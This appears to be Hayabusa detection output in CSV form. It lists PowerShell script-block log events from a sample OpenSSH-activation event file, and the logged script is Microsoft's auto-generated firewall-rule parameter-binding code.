Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 